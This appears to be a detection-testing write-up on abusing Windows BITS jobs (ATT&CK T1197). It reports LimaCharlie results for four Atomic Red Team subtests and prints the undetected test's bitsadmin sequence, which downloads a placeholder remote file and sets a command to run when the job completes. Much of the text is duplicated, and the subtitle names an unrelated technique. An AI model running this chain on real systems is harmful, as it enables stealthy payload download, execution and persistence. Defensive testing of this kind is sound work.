T1197: BITS job
Author: Stefan Waldvogel
LimaCharlie vs. Account Manipulation
Overview:
Description from ATT&CK
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.(Citation: CTU BITS Malware June 2016)
Source: github.com/redcanaryco/atomic-red-team/tree/master/atomics
Commands:
Invoke-AtomicTest T1197 -ShowDetailsBrief
Invoke-AtomicTest T1197 -CheckPrereqs
Invoke-AtomicTest T1197 -GetPrereqs
Invoke-AtomicTest T1197 -TestNumbers 1
Invoke-AtomicTest T1197 -Cleanup
Changes:
-none-
Limitations:
Results:
This section has 4 subtests.
Invoke-AtomicTest T1197 -TestNumbers 1, sigma, soteria, detected
Invoke-AtomicTest T1197 -TestNumbers 2, sigma, soteria detected
Invoke-AtomicTest T1197 -TestNumbers 3 not detected
Invoke-AtomicTest T1197 -TestNumbers 4, sigma, soteria detected
Description from ATT&CK
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.(Citation: CTU BITS Malware June 2016)
Source: github.com/redcanaryco/atomic-red-team/tree/master/atomics
Commands:
Invoke-AtomicTest T1197 -ShowDetailsBrief
Invoke-AtomicTest T1197 -CheckPrereqs
Invoke-AtomicTest T1197 -GetPrereqs
Invoke-AtomicTest T1197 -TestNumbers 1
Invoke-AtomicTest T1197 -Cleanup
Changes:
-none-
Limitations:
Results:
This section has 4 subtests.
Invoke-AtomicTest T1197 -TestNumbers 1, sigma, soteria, detected
Invoke-AtomicTest T1197 -TestNumbers 2, sigma, soteria detected
Invoke-AtomicTest T1197 -TestNumbers 3 not detected
Invoke-AtomicTest T1197 -TestNumbers 4, sigma, soteria detected
Test 1
Test 2
Test 4
What is test 3:
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
bitsadmin.exe /resume #{bits_job_name}
timeout 5
bitsadmin.exe /complete #{bits_job_name}
Detection:
Admin logs, PowerShell logs, and the Windows Event log for BITS activity?? BITS admin is not logged in the security events but in system as EventID 7040.
Maybe log separately as "evil.exe"
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
bitsadmin.exe /resume #{bits_job_name}
timeout 5
bitsadmin.exe /complete #{bits_job_name}
Detection:
Admin logs, PowerShell logs, and the Windows Event log for BITS activity?? BITS admin is not logged in the security events but in system as EventID 7040.
Maybe log separately as "evil.exe"
Test if this works:
© 2021. This work is licensed under a CC BY-SA 4.0 license